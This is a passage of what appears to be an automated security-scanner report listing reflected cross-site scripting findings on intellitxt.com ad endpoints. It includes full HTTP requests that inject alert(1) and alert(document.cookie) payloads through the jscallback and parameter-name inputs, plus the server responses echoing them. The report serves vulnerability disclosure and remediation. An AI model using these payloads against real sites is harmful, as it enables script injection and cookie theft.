Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:22:46 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Fri, 18 Feb 2011 15:22:46 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback95b734;alert(1)//79a8a9bd1be();}catch(e){}

3.56. http://pdastreet.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32ea6'-alert(1)-'e74a34b7216 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=26010&32ea6'-alert(1)-'e74a34b7216=1 HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVygRAA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:21:35 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVygRQA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:21:35 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:21:35 GMT
Age: 0
Connection: keep-alive
Content-Length: 10599

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
c="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218152135";})();$iTXT.js.serverUrl='http://pdastreet.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26010&32ea6'-alert(1)-'e74a34b7216=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.57. http://pdastreet.us.intellitxt.com/v4/advert [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6ef9b%3balert(1)//5afbc9e6ad4 was submitted in the jscallback parameter. This input was echoed as 6ef9b;alert(1)//5afbc9e6ad4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1298042588177&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&sid=0f813f309d5cacd41f37cc296f7d04b3&pvu=B5833CD53518442CBC5E30D5B26FA9D2&pvm=c94d0e979f8311611a6d3feb87776715&ipid=26010&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback86ef9b%3balert(1)//5afbc9e6ad4 HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:22:44 GMT
Age: 0
Connection: keep-alive
Content-Length: 12665

(function(){var nh = new $iTXT.ui.Hook({value: "mobile",uid: "2A836D895EC14C72AC24C9D232D5A08E",uidh: "9327353bf3d66ede3e875d4ec30da6e6",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl.
...[SNIP]...
return ad;})()});return nh;})();(function(){$iTXT.tmpl.load('FreeForm');$iTXT.tmpl.load('Generic');})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback86ef9b;alert(1)//5afbc9e6ad4();}catch(e){}

3.58. http://pdastreet.us.intellitxt.com/v4/context [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload eb568%3balert(1)//5852d7bbed6 was submitted in the jscallback parameter. This input was echoed as eb568;alert(1)//5852d7bbed6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1298042578302&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&sid=0f813f309d5cacd41f37cc296f7d04b3&pvu=B5833CD53518442CBC5E30D5B26FA9D2&pvm=c94d0e979f8311611a6d3feb87776715&ipid=26010&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=41002&jsoncl=6073&ppc=-1&hn=38&chunkkey=26010:0f813f309d5cacd41f37cc296f7d04b3:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A6%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A7%2Cc%3A%22338075590f4%3D1%20--%3E%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A8%2Cc%3A%22Listen%20as%20Kevin%20Remde%20and%20his%20guests%20discuss%20the%20productivity%20tools%20that%20business%20users%20expect...%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A9%2Cc%3A%22Internet.com's%20premiere%20site%20for%20mobile%20managers%20and%20IT%20professionals%20is%20where%20wireless%20meets%20business.%20Our%20expert%20analysis%20and%20tips%20will%20guide%20you%20in%20buying%2C%20deploying%2C%20securing%20an&chunk=0&total=7&jscallback=$iTXT.js.callback1eb568%3balert(1)//5852d7bbed6 HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Content-Length: 63
Date: Fri, 18 Feb 2011 15:22:49 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback1eb568;alert(1)//5852d7bbed6();}catch(e){}

3.59. http://pdastreet.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7c853%3balert(1)//91f488e00aa was submitted in the jscallback parameter. This input was echoed as 7c853;alert(1)//91f488e00aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042576928&pagecl=41002&fv=10&muid=&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&ipid=26010&jscallback=$iTXT.js.callback07c853%3balert(1)//91f488e00aa HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:23:16 GMT
Age: 0
Connection: keep-alive
Content-Length: 19497

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback07c853;alert(1)//91f488e00aa({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

3.60. http://pdastreet.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pdastreet.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba6a5"-alert(1)-"6765de298f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1298042576928&pagecl=41002&fv=10&muid=&refurl=http%3A%2F%2Fwww.pdastreet.com%2F%3F79bf7--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E338075590f4%3D1&ipid=26010&jscallback=$iTXT.js.callback0&ba6a5"-alert(1)-"6765de298f2=1 HTTP/1.1
Host: pdastreet.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wYAAAEuOVxrRAA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:23:20 GMT
Age: 0
Connection: keep-alive
Content-Length: 19478

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","ba6a5"-alert(1)-"6765de298f2":"1","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4\u003d1","rcc":"us","cc":"us"},null,60);var un
...[SNIP]...

3.61. http://smartphonetoday.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ac5ee%3balert(1)//e397277eba was submitted in the jscallback parameter. This input was echoed as ac5ee;alert(1)//e397277eba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110218152112&adid=0%2C0%2C0%2C0%2C0%2C0&cc=us&di=29608421%2C29608413%2C29608378%2C30073701%2C30019010%2C30073704&hk=1&ipid=26011&mh=5bbec50d8fe172507531204b6f39cc85&pid=2%2C2%2C2%2C2%2C2%2C2&pvm=4cedcfaeb263b70d71df9c7c8e01740b&pvu=F8F9754A003A48FEB9B6ABE9370A1463&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0&kp=377%2C358%3B674%2C799%3B475%2C1087%3B555%2C1181%3B517%2C1383%3B332%2C2095%3B&prf=ll%3A1582%7Cintl%3A2807%7Cpreprochrome%3A3%7Cgetconchrome%3A104%7Ccontint%3A9658%7Ccontl%3A12573%7Cadvint%3A1492%7Cadvl%3A14065%7Ctl%3A14167&jscallback=$iTXT.js.callback9ac5ee%3balert(1)//e397277eba HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:20:55 GMT; Path=/
Content-Type: text/javascript
Content-Length: 64
Date: Fri, 18 Feb 2011 15:20:55 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback9ac5ee;alert(1)//e397277eba();}catch(e){}

3.62. http://smartphonetoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9ed5'-alert(1)-'06b4bf80a8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=26011&a9ed5'-alert(1)-'06b4bf80a8c=1 HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wQAAAEuOVhn9AA-

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVqvOwA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:19:27 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Set-Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVqvOwA-; Domain=.intellitxt.com; Expires=Tue, 19-Apr-2011 15:19:27 GMT; Path=/
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:19:27 GMT
Age: 0
Connection: keep-alive
Content-Length: 10605

document.itxtDisabled=1;
document.itxtDebugOn=false;
if(document.itxtDisabled){
document.itxtInProg=1;
if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT
...[SNIP]...
p://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=90000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110218151927";})();$iTXT.js.serverUrl='http://smartphonetoday.us.intellitxt.com';$iTXT.js.pageQuery='ipid=26011&a9ed5'-alert(1)-'06b4bf80a8c=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();};
}

3.63. http://smartphonetoday.us.intellitxt.com/v4/advert [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /v4/advert

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b7268%3balert(1)//eac604c61a3 was submitted in the jscallback parameter. This input was echoed as b7268;alert(1)//eac604c61a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/advert?ts=1298042470709&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&sid=5bbec50d8fe172507531204b6f39cc85&pvu=F8F9754A003A48FEB9B6ABE9370A1463&pvm=4cedcfaeb263b70d71df9c7c8e01740b&ipid=26011&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&jscallback=$iTXT.js.callback8b7268%3balert(1)//eac604c61a3 HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.smartphonetoday.com/?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_USR=ANkSyp+gB0LFkFNngJhTlV8AADqvAAA66wUAAAEuOVsIpQA-

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Fri, 18 Feb 2011 15:20:53 GMT
Age: 0
Connection: keep-alive
Content-Length: 12665

(function(){var nh = new $iTXT.ui.Hook({value: "mobile",uid: "09EBBEA915474367B32F83557F9A7F49",uidh: "9daf5377f0fb212ec92c7b0ce9b588ed",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.tmpl.
...[SNIP]...
return ad;})()});return nh;})();(function(){$iTXT.tmpl.load('FreeForm');$iTXT.tmpl.load('Generic');})();$iTXT.glob.track.rand=[];$iTXT.glob.track.guar=[];$iTXT.glob.track.hook=[];try{$iTXT.js.callback8b7268;alert(1)//eac604c61a3();}catch(e){}

3.64. http://smartphonetoday.us.intellitxt.com/v4/context [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://smartphonetoday.us.intellitxt.com
Path:   /v4/context

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 39e99%3balert(1)//26306191dc7 was submitted in the jscallback parameter. This input was echoed as 39e99;alert(1)//26306191dc7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/context?ts=1298042461051&refurl=http%3A%2F%2Fwww.smartphonetoday.com%2F%3F10d85--%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E11ae5b1cf82%3D1&sid=5bbec50d8fe172507531204b6f39cc85&pvu=F8F9754A003A48FEB9B6ABE9370A1463&pvm=4cedcfaeb263b70d71df9c7c8e01740b&ipid=26011&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&eat=&dat=62%2C76%2C32%2C46%2C34%2C12%2C6%2C18%2C77%2C87%2C89%2C140&pagecl=61592&jsoncl=5886&ppc=-1&hn=37&chunkkey=26011:5bbec50d8fe172507531204b6f39cc85:D912CA9FA00742C5905367809853955F:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A2%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A3%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A4%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A6%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%2C%7Bt%3A%22std%22%2Cn%3A7%2Cc%3A%2211ae5b1cf82%3D1%20--%3E%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A8%2Cc%3A%22Internet.com's%20premiere%20site%20for%20mobile%20managers%20and%20IT%20professionals%20is%20where%20wireless%20meets%20business.%20Our%20expert%20analysis%20and%20tips%20will%20guide%20you%20in%20buying%2C%20deploying%2C%20securing%20and%20managing%20mobile%20technology%20in%20the%20enterprise.%20You'll%20find%20strategic%20analysis%2C%20best%20practices%2C%20news%2C%20buyer.s%20guides%20and%20practical%20advice%20on%20how%20to%20evaluate%20and%20support%20a%20wide%20range%20of%20devices%20in%20the%20workforce.%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D&chunk=0&total=7&jscallback=$iTXT.js.callback139e99%3balert(1)//26306191dc7 HTTP/1.1
Host: smartphonetoday.us.intellitxt.com
Proxy-Connection: keep-alive
